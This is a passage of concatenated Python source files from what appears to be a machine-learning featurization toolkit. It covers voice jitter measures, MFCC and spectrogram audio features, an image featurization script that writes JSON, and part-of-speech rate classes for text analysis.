p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the ppq5 jitter.
"""
counter = 0
cumsum = 0
mean_period = get_mean_period(frequencies, p_floor, p_ceil, max_p_factor)
for freq1, freq2, freq3, freq4, freq5 in shifted_sequence(frequencies, 5):
if validate_frequencies([freq1, freq2, freq3, freq4, freq5], p_floor, p_ceil, max_p_factor):
counter += 1
cumsum += np.abs(1 / freq3 - (1 / freq1 + 1 / freq2 + 1 / freq3 + 1 / freq4 + 1 / freq5) / 5)
if counter != 0:
ppq5_jitter = (cumsum / counter) / mean_period if mean_period != 0 else None
return ppq5_jitter
return None
def get_ddp_jitter(frequencies, p_floor, p_ceil, max_p_factor):
"""Given a sequence of frequencies, and some period conditions,
compute the ddp jitter, as per
http://www.fon.hum.uva.nl/praat/manual/PointProcess__Get_jitter__ddp____.html
Args:
frequencies (sequence, eg list, of floats): sequence of estimated frequencies
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
float: the ddp jitter.
"""
counter = 0
cumsum = 0
mean_period = get_mean_period(frequencies, p_floor, p_ceil, max_p_factor)
for freq1, freq2, freq3 in shifted_sequence(frequencies, 3):
if validate_frequencies([freq1, freq2, freq3], p_floor, p_ceil, max_p_factor):
counter += 1
cumsum += np.abs((1 / freq3 - 1 / freq2) - (1 / freq2 - 1 / freq1))
if counter != 0:
ddp_jitter = (cumsum / counter) / mean_period if mean_period != 0 else None
return ddp_jitter
return None
def get_jitters(f0_contour, p_floor=0.0001, p_ceil=0.02, max_p_factor=1.3):
"""Compute the jitters mathematically, according to certain conditions
given by p_floor, p_ceil and max_p_factor.
Args:
f0_contour (np.array [T / hop_length, ]): the fundamental frequency contour.
p_floor (float): minimum acceptable period.
p_ceil (float): maximum acceptable period.
max_p_factor (float): value to use for the period factor principle
Returns:
dict: Dictionary mapping strings to floats, with keys
"localJitter", "localabsoluteJitter", "rapJitter", "ppq5Jitter",
"ddpJitter"
"""
local_absolute_jitter = get_local_absolute_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
local_jitter = get_local_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
rap_jitter = get_rap_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
ppq5_jitter = get_ppq5_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
ddp_jitter = get_ddp_jitter(f0_contour, p_floor, p_ceil, max_p_factor)
jitters_dict = {
"localJitter": local_jitter,
"localabsoluteJitter": local_absolute_jitter,
"rapJitter": rap_jitter,
"ppq5Jitter": ppq5_jitter,
"ddpJitter": ddp_jitter,
}
return jitters_dict
```
#### File: features/audio_features/pyaudiolex_features.py
```python
import argparse, json, os, sys
sys.path.append(os.getcwd()+'/helpers/pyAudioLex')
from helpers.pyAudioLex import audio_ as audio
import pandas as pd
from datetime import datetime
def pyaudiolex_featurize(filename):
# features
results = audio.audio_featurize(filename)
labels=list(results)
features=list(results.values())
# combine all features and values into proper format for Allie
new_features=list()
new_labels=list()
for i in range(len(labels)):
# print(labels[i])
for j in range(len(features[i])):
new_labels.append(labels[i]+'_window_'+str(j))
new_features.append(features[i][j])
features=new_features
labels=new_labels
return features, labels
```
#### File: features/audio_features/spectrogram_features.py
```python
import os
import librosa
import numpy as np
from sklearn.decomposition import PCA
def spectrogram_featurize(file_path):
n_fft = 1024
sr = 32000
mono = True
log_spec = False
n_mels = 128
hop_length = 192
fmax = None
if mono:
sig, sr = librosa.load(file_path, sr=sr, mono=True)
sig = sig[np.newaxis]
else:
sig, sr = librosa.load(file_path, sr=sr, mono=False)
spectrograms = []
for y in sig:
# compute stft
stft = librosa.stft(y, n_fft=n_fft, hop_length=hop_length, win_length=None, window='hann', center=True, pad_mode='reflect')
# keep only amplitures
stft = np.abs(stft)
# log spectrogram
stft = np.log10(stft + 1)
# apply mel filterbank
spectrogram = librosa.feature.melspectrogram(S=stft, sr=sr, n_mels=n_mels, fmax=fmax)
# keep spectrogram
spectrograms.append(np.asarray(spectrogram))
labels=list()
mean_features=np.mean(np.array(spectrograms), axis=2)[0]
for i in range(len(mean_features)):
labels.append('log_spectrogram_mean_feature_%s'%(str(i+1)))
std_features=np.std(np.array(spectrograms), axis=2)[0]
for i in range(len(std_features)):
labels.append('log_spectrogram_std_feature_%s'%(str(i+1)))
# np.ndarray.flatten
features=np.append(mean_features, std_features)
return features, labels
```
#### File: features/audio_features/standard_features.py
```python
import librosa, os, uuid
import numpy as np
from pydub import AudioSegment
def audio_featurize(wavfile):
#initialize features
hop_length = 512
n_fft=2048
#load file
y, sr = librosa.load(wavfile)
#extract mfcc coefficients
mfcc = librosa.feature.mfcc(y=y, sr=sr, hop_length=hop_length, n_mfcc=13)
mfcc_delta = librosa.feature.delta(mfcc)
#extract mean, standard deviation, min, and max value in mfcc frame, do this across all mfccs
mfcc_features=np.array([np.mean(mfcc[0]),np.std(mfcc[0]),np.amin(mfcc[0]),np.amax(mfcc[0]),
np.mean(mfcc[1]),np.std(mfcc[1]),np.amin(mfcc[1]),np.amax(mfcc[1]),
np.mean(mfcc[2]),np.std(mfcc[2]),np.amin(mfcc[2]),np.amax(mfcc[2]),
np.mean(mfcc[3]),np.std(mfcc[3]),np.amin(mfcc[3]),np.amax(mfcc[3]),
np.mean(mfcc[4]),np.std(mfcc[4]),np.amin(mfcc[4]),np.amax(mfcc[4]),
np.mean(mfcc[5]),np.std(mfcc[5]),np.amin(mfcc[5]),np.amax(mfcc[5]),
np.mean(mfcc[6]),np.std(mfcc[6]),np.amin(mfcc[6]),np.amax(mfcc[6]),
np.mean(mfcc[7]),np.std(mfcc[7]),np.amin(mfcc[7]),np.amax(mfcc[7]),
np.mean(mfcc[8]),np.std(mfcc[8]),np.amin(mfcc[8]),np.amax(mfcc[8]),
np.mean(mfcc[9]),np.std(mfcc[9]),np.amin(mfcc[9]),np.amax(mfcc[9]),
np.mean(mfcc[10]),np.std(mfcc[10]),np.amin(mfcc[10]),np.amax(mfcc[10]),
np.mean(mfcc[11]),np.std(mfcc[11]),np.amin(mfcc[11]),np.amax(mfcc[11]),
np.mean(mfcc[12]),np.std(mfcc[12]),np.amin(mfcc[12]),np.amax(mfcc[12]),
np.mean(mfcc_delta[0]),np.std(mfcc_delta[0]),np.amin(mfcc_delta[0]),np.amax(mfcc_delta[0]),
np.mean(mfcc_delta[1]),np.std(mfcc_delta[1]),np.amin(mfcc_delta[1]),np.amax(mfcc_delta[1]),
np.mean(mfcc_delta[2]),np.std(mfcc_delta[2]),np.amin(mfcc_delta[2]),np.amax(mfcc_delta[2]),
np.mean(mfcc_delta[3]),np.std(mfcc_delta[3]),np.amin(mfcc_delta[3]),np.amax(mfcc_delta[3]),
np.mean(mfcc_delta[4]),np.std(mfcc_delta[4]),np.amin(mfcc_delta[4]),np.amax(mfcc_delta[4]),
np.mean(mfcc_delta[5]),np.std(mfcc_delta[5]),np.amin(mfcc_delta[5]),np.amax(mfcc_delta[5]),
np.mean(mfcc_delta[6]),np.std(mfcc_delta[6]),np.amin(mfcc_delta[6]),np.amax(mfcc_delta[6]),
np.mean(mfcc_delta[7]),np.std(mfcc_delta[7]),np.amin(mfcc_delta[7]),np.amax(mfcc_delta[7]),
np.mean(mfcc_delta[8]),np.std(mfcc_delta[8]),np.amin(mfcc_delta[8]),np.amax(mfcc_delta[8]),
np.mean(mfcc_delta[9]),np.std(mfcc_delta[9]),np.amin(mfcc_delta[9]),np.amax(mfcc_delta[9]),
np.mean(mfcc_delta[10]),np.std(mfcc_delta[10]),np.amin(mfcc_delta[10]),np.amax(mfcc_delta[10]),
np.mean(mfcc_delta[11]),np.std(mfcc_delta[11]),np.amin(mfcc_delta[11]),np.amax(mfcc_delta[11]),
np.mean(mfcc_delta[12]),np.std(mfcc_delta[12]),np.amin(mfcc_delta[12]),np.amax(mfcc_delta[12])])
return mfcc_features
def exportfile(newAudio,time1,time2,filename,i):
#Exports to a wav file in the current path.
newAudio2 = newAudio[time1:time2]
g=os.listdir()
if filename[0:-4]+'_'+str(i)+'.wav' in g:
filename2=str(uuid.uuid4())+'_segment'+'.wav'
print('making %s'%(filename2))
newAudio2.export(filename2,format="wav")
else:
filename2=str(uuid.uuid4())+'.wav'
print('making %s'%(filename2))
newAudio2.export(filename2, format="wav")
return filename2
def audio_time_features(filename):
#recommend >0.50 seconds for timesplit
timesplit=0.50
hop_length = 512
n_fft=2048
y, sr = librosa.load(filename)
duration=float(librosa.core.get_duration(y))
#Now splice an audio signal into individual elements of 100 ms and extract
#all these features per 100 ms
segnum=round(duration/timesplit)
deltat=duration/segnum
timesegment=list()
time=0
for i in range(segnum):
#milliseconds
timesegment.append(time)
time=time+deltat*1000
if filename[-4:]=='.wav':
newAudio = AudioSegment.from_wav(filename)
elif filename[-4:]=='.mp3':
newAudio = AudioSegment.from_mp3(filename)
filelist=list()
for i in range(len(timesegment)-1):
filename=exportfile(newAudio,timesegment[i],timesegment[i+1],filename,i)
filelist.append(filename)
featureslist=np.array([0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0,
0,0,0,0])
#save 100 ms segments in current folder (delete them after)
for j in range(len(filelist)):
try:
features=audio_featurize(filelist[i])
featureslist=featureslist+features
os.remove(filelist[j])
except:
print('error splicing')
featureslist.append('silence')
os.remove(filelist[j])
# now scale the featureslist array by the length to get mean in each category
featureslist=featureslist/segnum
return featureslist
def standard_featurize(filename):
features=np.append(audio_featurize(filename), audio_time_features(filename))
# labels
labels=['mfcc_1_mean_20ms','mfcc_1_std_20ms', 'mfcc_1_min_20ms', 'mfcc_1_max_20ms',
'mfcc_2_mean_20ms','mfcc_2_std_20ms', 'mfcc_2_min_20ms', 'mfcc_2_max_20ms',
'mfcc_3_mean_20ms','mfcc_3_std_20ms', 'mfcc_3_min_20ms', 'mfcc_3_max_20ms',
'mfcc_4_mean_20ms','mfcc_4_std_20ms', 'mfcc_4_min_20ms', 'mfcc_4_max_20ms',
'mfcc_5_mean_20ms','mfcc_5_std_20ms', 'mfcc_5_min_20ms', 'mfcc_5_max_20ms',
'mfcc_6_mean_20ms','mfcc_6_std_20ms', 'mfcc_6_min_20ms', 'mfcc_6_max_20ms',
'mfcc_7_mean_20ms','mfcc_7_std_20ms', 'mfcc_7_min_20ms', 'mfcc_7_max_20ms',
'mfcc_8_mean_20ms','mfcc_8_std_20ms', 'mfcc_8_min_20ms', 'mfcc_8_max_20ms',
'mfcc_9_mean_20ms','mfcc_9_std_20ms', 'mfcc_9_min_20ms', 'mfcc_9_max_20ms',
'mfcc_10_mean_20ms','mfcc_10_std_20ms', 'mfcc_10_min_20ms', 'mfcc_10_max_20ms',
'mfcc_11_mean_20ms','mfcc_11_std_20ms', 'mfcc_11_min_20ms', 'mfcc_11_max_20ms',
'mfcc_12_mean_20ms','mfcc_12_std_20ms', 'mfcc_12_min_20ms', 'mfcc_12_max_20ms',
'mfcc_13_mean_20ms','mfcc_13_std_20ms', 'mfcc_13_min_20ms', 'mfcc_13_max_20ms',
'mfcc_1_delta_mean_20ms','mfcc_1_delta_std_20ms', 'mfcc_1_delta_min_20ms', 'mfcc_1_delta_max_20ms',
'mfcc_2_delta_mean_20ms','mfcc_2_delta_std_20ms', 'mfcc_2_delta_min_20ms', 'mfcc_2_delta_max_20ms',
'mfcc_3_delta_mean_20ms','mfcc_3_delta_std_20ms', 'mfcc_3_delta_min_20ms', 'mfcc_3_delta_max_20ms',
'mfcc_4_delta_mean_20ms','mfcc_4_delta_std_20ms', 'mfcc_4_delta_min_20ms', 'mfcc_4_delta_max_20ms',
'mfcc_5_delta_mean_20ms','mfcc_5_delta_std_20ms', 'mfcc_5_delta_min_20ms', 'mfcc_5_delta_max_20ms',
'mfcc_6_delta_mean_20ms','mfcc_6_delta_std_20ms', 'mfcc_6_delta_min_20ms', 'mfcc_6_delta_max_20ms',
'mfcc_7_delta_mean_20ms','mfcc_7_delta_std_20ms', 'mfcc_7_delta_min_20ms', 'mfcc_7_delta_max_20ms',
'mfcc_8_delta_mean_20ms','mfcc_8_delta_std_20ms', 'mfcc_8_delta_min_20ms', 'mfcc_8_delta_max_20ms',
'mfcc_9_delta_mean_20ms','mfcc_9_delta_std_20ms', 'mfcc_9_delta_min_20ms', 'mfcc_9_delta_max_20ms',
'mfcc_10_delta_mean_20ms','mfcc_10_delta_std_20ms', 'mfcc_10_delta_min_20ms', 'mfcc_10_delta_max_20ms',
'mfcc_11_delta_mean_20ms','mfcc_11_delta_std_20ms', 'mfcc_11_delta_min_20ms', 'mfcc_11_delta_max_20ms',
'mfcc_12_delta_mean_20ms','mfcc_12_delta_std_20ms', 'mfcc_12_delta_min_20ms', 'mfcc_12_delta_max_20ms',
'mfcc_13_delta_mean_20ms','mfcc_13_delta_std_20ms', 'mfcc_13_delta_min_20ms', 'mfcc_13_delta_max_20ms',
'mfcc_1_mean_500ms','mfcc_1_std_500ms', 'mfcc_1_min_500ms', 'mfcc_1_max_500ms',
'mfcc_2_mean_500ms','mfcc_2_std_500ms', 'mfcc_2_min_500ms', 'mfcc_2_max_500ms',
'mfcc_3_mean_500ms','mfcc_3_std_500ms', 'mfcc_3_min_500ms', 'mfcc_3_max_500ms',
'mfcc_4_mean_500ms','mfcc_4_std_500ms', 'mfcc_4_min_500ms', 'mfcc_4_max_500ms',
'mfcc_5_mean_500ms','mfcc_5_std_500ms', 'mfcc_5_min_500ms', 'mfcc_5_max_500ms',
'mfcc_6_mean_500ms','mfcc_6_std_500ms', 'mfcc_6_min_500ms', 'mfcc_6_max_500ms',
'mfcc_7_mean_500ms','mfcc_7_std_500ms', 'mfcc_7_min_500ms', 'mfcc_7_max_500ms',
'mfcc_8_mean_500ms','mfcc_8_std_500ms', 'mfcc_8_min_500ms', 'mfcc_8_max_500ms',
'mfcc_9_mean_500ms','mfcc_9_std_500ms', 'mfcc_9_min_500ms', 'mfcc_9_max_500ms',
'mfcc_10_mean_500ms','mfcc_10_std_500ms', 'mfcc_10_min_500ms', 'mfcc_10_max_500ms',
'mfcc_11_mean_500ms','mfcc_11_std_500ms', 'mfcc_11_min_500ms', 'mfcc_11_max_500ms',
'mfcc_12_mean_500ms','mfcc_12_std_500ms', 'mfcc_12_min_500ms', 'mfcc_12_max_500ms',
'mfcc_13_mean_500ms','mfcc_13_std_500ms', 'mfcc_13_min_500ms', 'mfcc_13_max_500ms',
'mfcc_1_delta_mean_500ms','mfcc_1_delta_std_500ms', 'mfcc_1_delta_min_500ms', 'mfcc_1_delta_max_500ms',
'mfcc_2_delta_mean_500ms','mfcc_2_delta_std_500ms', 'mfcc_2_delta_min_500ms', 'mfcc_2_delta_max_500ms',
'mfcc_3_delta_mean_500ms','mfcc_3_delta_std_500ms', 'mfcc_3_delta_min_500ms', 'mfcc_3_delta_max_500ms',
'mfcc_4_delta_mean_500ms','mfcc_4_delta_std_500ms', 'mfcc_4_delta_min_500ms', 'mfcc_4_delta_max_500ms',
'mfcc_5_delta_mean_500ms','mfcc_5_delta_std_500ms', 'mfcc_5_delta_min_500ms', 'mfcc_5_delta_max_500ms',
'mfcc_6_delta_mean_500ms','mfcc_6_delta_std_500ms', 'mfcc_6_delta_min_500ms', 'mfcc_6_delta_max_500ms',
'mfcc_7_delta_mean_500ms','mfcc_7_delta_std_500ms', 'mfcc_7_delta_min_500ms', 'mfcc_7_delta_max_500ms',
'mfcc_8_delta_mean_500ms','mfcc_8_delta_std_500ms', 'mfcc_8_delta_min_500ms', 'mfcc_8_delta_max_500ms',
'mfcc_9_delta_mean_500ms','mfcc_9_delta_std_500ms', 'mfcc_9_delta_min_500ms', 'mfcc_9_delta_max_500ms',
'mfcc_10_delta_mean_500ms','mfcc_10_delta_std_500ms', 'mfcc_10_delta_min_500ms', 'mfcc_10_delta_max_500ms',
'mfcc_11_delta_mean_500ms','mfcc_11_delta_std_500ms', 'mfcc_11_delta_min_500ms', 'mfcc_11_delta_max_500ms',
'mfcc_12_delta_mean_500ms','mfcc_12_delta_std_500ms', 'mfcc_12_delta_min_500ms', 'mfcc_12_delta_max_500ms',
'mfcc_13_delta_mean_500ms','mfcc_13_delta_std_500ms', 'mfcc_13_delta_min_500ms', 'mfcc_13_delta_max_500ms']
return features, labels
```
#### File: features/image_features/featurize.py
```python
import helpers.audio_plot as ap
import numpy as np
import os, json, sys
from tqdm import tqdm
##################################################
## Helper functions. ##
##################################################
def prev_dir(directory):
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
def image_featurize(feature_set, imgfile, cur_dir, haar_dir):
if feature_set == 'image_features':
features, labels=imf.image_featurize(cur_dir, haar_dir, imgfile)
elif feature_set == 'vgg16_features':
features, labels=v16f.vgg16_featurize(imgfile)
elif feature_set == 'inception_features':
features, labels=incf.inception_featurize(imgfile)
elif feature_set == 'xception_features':
features, labels=xf.xception_featurize(imgfile)
elif feature_set == 'resnet_features':
features, labels=rf.resnet_featurize(imgfile)
elif feature_set == 'vgg19_features':
features, labels=v19f.vgg19_featurize(imgfile)
elif feature_set == 'tesseract_features':
transcript, features, labels = tf.tesseract_featurize(imgfile)
elif feature_set == 'squeezenet_features':
features, labels=sf.squeezenet_featurize(imgfile, cur_dir)
# make sure all the features do not have any infinity or NaN
features=np.nan_to_num(np.array(features))
features=features.tolist()
return features, labels
##################################################
## Main script ##
##################################################
# directory=sys.argv[1]
basedir=os.getcwd()
haar_dir=basedir+'/helpers/haarcascades'
foldername=sys.argv[1]
os.chdir(foldername)
cur_dir=os.getcwd()
listdir=os.listdir()
# settings directory
settingsdir=prev_dir(basedir)
sys.path.append(settingsdir)
from standard_array import make_features
settings=json.load(open(prev_dir(settingsdir)+'/settings.json'))
os.chdir(basedir)
image_transcribe=settings['transcribe_image']
default_image_transcriber=settings['default_image_transcriber']
try:
feature_sets=[sys.argv[2]]
except:
feature_sets=settings['default_image_features']
##################################################
## Only load relevant features ##
##################################################
if 'vgg16_features' in feature_sets:
import vgg16_features as v16f
if 'image_features' in feature_sets:
import image_features as imf
if 'inception_features' in feature_sets:
import inception_features as incf
if 'xception_features' in feature_sets:
import xception_features as xf
if 'resnet_features' in feature_sets:
import resnet_features as rf
if 'vgg19_features' in feature_sets:
import vgg19_features as v19f
if 'squeezenet_features' in feature_sets:
import squeezenet_features as sf
if image_transcribe == True or 'tesseract_features' in feature_sets:
import tesseract_features as tf
# get class label from folder name
labelname=foldername.split('/')
if labelname[-1]=='':
labelname=labelname[-2]
else:
labelname=labelname[-1]
##################################################
## Main loop ##
##################################################
# featurize all files accoridng to librosa featurize
for i in tqdm(range(len(listdir)), desc=labelname):
os.chdir(cur_dir)
if listdir[i][-4:] in ['.jpg', '.png']:
try:
imgfile=listdir[i]
sampletype='image'
# I think it's okay to assume audio less than a minute here...
if listdir[i][0:-4]+'.json' not in listdir:
# make new .JSON if it is not there with base array schema.
basearray=make_features(sampletype)
if image_transcribe==True:
for j in range(len(default_image_transcriber)):
transcript, features, labels = tf.tesseract_featurize(imgfile)
transcript_list=basearray['transcripts']
transcript_list['image'][default_image_transcriber[j]]=transcript
basearray['transcripts']=transcript_list
# featurize the image file with specified featurizers
for j in range(len(feature_sets)):
feature_set=feature_sets[j]
features, labels = image_featurize(feature_set, imgfile, cur_dir, haar_dir)
print(features)
try:
data={'features':features.tolist(),
'labels': labels}
except:
data={'features':features,
'labels': labels}
image_features=basearray['features']['image']
image_features[feature_set]=data
basearray['features']['image']=image_features
basearray['labels']=[labelname]
# write to .JSON
jsonfile=open(listdir[i][0:-4]+'.json','w')
json.dump(basearray, jsonfile)
jsonfile.close()
elif listdir[i][0:-4]+'.json' in listdir:
# overwrite existing .JSON if it is there.
basearray=json.load(open(listdir[i][0:-4]+'.json'))
transcript_list=basearray['transcripts']
# only re-transcribe if necessary
if image_transcribe==True:
for j in range(len(default_image_transcriber)):
if default_image_transcriber[j] not in list(transcript_list['image']):
transcript, features, labels = tf.tesseract_featurize(imgfile)
transcript_list['image'][default_image_transcriber[j]]=transcript
basearray['transcripts']=transcript_list
# only re-featurize if necessary (checks if relevant feature embedding exists)
for j in range(len(feature_sets)):
# load feature set
feature_set=feature_sets[j]
# only add in if it is not in the image feature list array
if feature_set not in list(basearray['features']['image']):
features, labels = image_featurize(feature_set, imgfile, cur_dir, haar_dir)
try:
data={'features':features.tolist(),
'labels': labels}
except:
data={'features':features,
'labels': labels}
print(features)
basearray['features']['image'][feature_set]=data
# only add label if necessary
label_list=basearray['labels']
if labelname not in label_list:
label_list.append(labelname)
basearray['labels']=label_list
# overwrite .JSON file
jsonfile=open(listdir[i][0:-4]+'.json','w')
json.dump(basearray, jsonfile)
jsonfile.close()
except:
print('error')
```
#### File: allie/features/standard_array.py
```python
import os, time, psutil, json, platform
from datetime import datetime
def prev_dir(directory):
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
def make_features(sampletype):
# only add labels when we have actual labels.
features={'audio':dict(),
'text': dict(),
'image':dict(),
'video':dict(),
'csv': dict()}
transcripts={'audio': dict(),
'text': dict(),
'image': dict(),
'video': dict(),
'csv': dict()}
models={'audio': dict(),
'text': dict(),
'image': dict(),
'video': dict(),
'csv': dict()}
# getting settings can be useful to see if settings are the same in every
# featurization, as some featurizations can rely on certain settings to be consistent
prevdir=prev_dir(os.getcwd())
try:
settings=json.load(open(prevdir+'/settings.json'))
except:
# this is for folders that may be 2 layers deep in train_dir
settings=json.load(open(prev_dir(prevdir)+'/settings.json'))
data={'sampletype': sampletype,
'transcripts': transcripts,
'features': features,
'models': models,
'labels': [],
'errors': [],
'settings': settings,
}
return data
```
#### File: blabla/sentence_aggregators/lexico_semantic_fearture_aggregator.py
```python
from blabla.sentence_processor.lexico_semantic_feature_engine import num_demonstratives
from blabla.utils.global_params import *
from collections import Counter
import numpy as np
import math
import blabla.utils.settings as settings
from blabla.utils.global_params import *
class Adjective_Rate(object):
"""Class to calculate the adjective rate
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adjective rate
Args:
None
Returns:
The total number of adjectives to the total number of words
"""
tot_num_adjs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_words += so.num_words()
return tot_num_adjs / tot_num_words
class Adposition_Rate(object):
"""Class to calculate the adposition rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun rate
Args:
None
Returns:
The total number of nouns to the total number of words
"""
tot_num_nouns, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_words += so.num_words()
return tot_num_nouns / tot_num_words
class Adverb_Rate(object):
"""Class to calculate the adverb rate
Ref: https://www.cs.toronto.edu/~kfraser/Fraser15-JAD.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adverb rate
Args:
None
Returns:
The total number of adverbs to the total number of words
"""
tot_num_advs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_words += so.num_words()
return tot_num_advs / tot_num_words
class Auxiliary_Rate(object):
"""Class to calculate the auxiliary rate
Ref: https://www.cs.toronto.edu/~kfraser/Fraser15-JAD.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the adverb rate
Args:
None
Returns:
The total number of adverbs to the total number of words
"""
tot_num_advs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(AUXILIARY)
tot_num_words += so.num_words()
return tot_num_advs / tot_num_words
class Conjunction_Rate(object):
"""Class to calculate the conjunctions rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Determiner_Rate(object):
"""Class to calculate the determiner rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Interjection_Rate(object):
"""Class to calculate the interjection rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(INTERJECTION)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Noun_Rate(object):
"""Class to calculate the noun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun rate
Args:
None
Returns:
The total number of nouns to the total number of words
"""
tot_num_nouns, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_words += so.num_words()
return tot_num_nouns / tot_num_words
class Numeral_Rate(object):
"""Class to calculate the numeral rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(NUMERAL)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Particle_Rate(object):
"""Class to calculate the particle rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the conjunctions rate
Args:
None
Returns:
The total number of conjunctions to the total number of words
"""
tot_num_cconj, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(PARTICLE)
tot_num_words += so.num_words()
return tot_num_cconj / tot_num_words
class Pronoun_Rate(object):
"""Class to calculate the pronoun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Proper_Noun_Rate(object):
"""Class to calculate the proper noun rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PROPER_NOUN)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Punctuation_Rate(object):
"""Class to calculate the punctuation rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PUNCTUATION)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Subordinating_Conjunction_Rate(object):
"""Class to calculate the subordinating conjuction rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
